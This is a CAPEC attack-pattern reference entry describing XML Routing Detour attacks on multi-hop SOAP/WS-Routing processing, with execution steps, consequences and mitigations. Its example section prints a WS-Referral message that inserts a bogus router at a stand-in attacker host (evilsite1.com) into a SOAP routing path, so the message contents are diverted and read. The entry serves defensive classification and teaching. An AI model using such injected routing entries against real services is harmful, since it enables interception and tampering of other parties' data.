Home > CAPEC List > CAPEC-219: XML Routing Detour Attacks (Version 3.0)  

CAPEC-219: XML Routing Detour Attacks

Attack Pattern ID: 219
Abstraction: Standard
Status: Draft
Presentation Filter:
+ Description
An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.
+ Likelihood Of Attack

High

+ Typical Severity

Medium

+ Relationships

The table(s) below shows the other attack patterns and high level categories that are related to this attack pattern. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and CanAlsoBe are defined to show similar attack patterns that the user may want to explore.

+ Relevant to the view "Mechanisms of Attack" (CAPEC-1000)
NatureTypeIDName
ChildOfStandard Attack PatternStandard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.94Man in the Middle Attack
+ Execution Flow
Explore
  1. Survey the target: Using command line or an automated tool, an attacker records all instances of web services to process XML requests. Use automated tool to record all instances to process XML requests or find exposed WSDL. Use tools to crawl WSDL

    Techniques
    Use automated tool to record all instances to process XML requests or find exposed WSDL.
    Use tools to crawl WSDL
Experiment
  1. Identify SOAP messages that have multiple state processing.: Inspect instance to see whether the XML processing has multiple stages or not. Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.

    Techniques
    Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.
Exploit
  1. Launch an XML routing detour attack: The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents). The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message

    Techniques
    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message
+ Prerequisites
The targeted system must have multiple stages processing of XML content.
+ Skills Required
[Level: Low]
To inject a bogus node in the XML routing table
+ Resources Required
The attacker must be able to insert or compromise a system into the processing path for the transaction.
+ Consequences

The table below specifies different individual consequences associated with the attack pattern. The Scope identifies the security property that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in their attack. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a pattern will be used to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

ScopeImpactLikelihood
Integrity
Modify Data
Confidentiality
Read Data
Accountability
Authentication
Authorization
Non-Repudiation
Gain Privileges
Access Control
Authorization
Bypass Protection Mechanism
+ Mitigations
Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.
Implementation: Use SSL for connections between all parties with mutual authentication.
+ Example Instances

Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).

Example SOAP message with routing information in header:
<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>
Add an additional node (example3.com/router) to the XML path in a WS-Referral message
<r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://example3.com/router</r:via> </r:go> </r:ref>
Resulting in the following SOAP Header:
<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>

In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted.

Example of WS-Referral based WS-Routing injection of the bogus node route:
<r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://evilsite1.com/router</r:via> </r:go> </r:ref>
Resulting XML Routing Detour attack:
<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example_0.com/</m:action> <m:to>http://example_4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://evilesite1.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>

Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).

+ Memberships
This MemberOf Relationships table shows additional CAPEC Categories and Views that reference this attack pattern as a member. This information is often useful in understanding where a attack pattern fits within the context of external information sources.
NatureTypeIDName
MemberOfCategoryCategory - A category in CAPEC is a collection of attack patterns based on some common characteristic. More specifically, it is an aggregation of attack patterns based on effect/intent (as opposed to actions or mechanisms, such an aggregation would be a meta attack pattern). An aggregation based on effect/intent is not an actionable attack and as such is not a pattern of attack behavior. Rather, it is a grouping of patterns based on some common criteria.365WASC-32 - Routing Detour
MemberOfCategoryCategory - A category in CAPEC is a collection of attack patterns based on some common characteristic. More specifically, it is an aggregation of attack patterns based on effect/intent (as opposed to actions or mechanisms, such an aggregation would be a meta attack pattern). An aggregation based on effect/intent is not an actionable attack and as such is not a pattern of attack behavior. Rather, it is a grouping of patterns based on some common criteria.377WASC-44 - XML Entity Expansion
+ References
[REF-80] "WASC Threat Classification 2.0". WASC-32 - Routing Detour. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/w/page/13246956/Routing-Detour>.
[REF-81] Andre Yee. "Threat Protection in a Service Oriented World". NFR Security. <http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf>.
[REF-65] Pete Lindstrom. "Attacking & Defending Web Services". SPiRE Security. 2002. <http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf>.
+ Content History
Submissions
Submission DateSubmitterOrganization
2014-06-23CAPEC Content TeamThe MITRE Corporation
Modifications
Modification DateModifierOrganization
2017-08-04CAPEC Content TeamThe MITRE Corporation
Updated Related_Attack_Patterns

More information is available — Please select a different filter.
Page Last Updated or Reviewed: July 31, 2018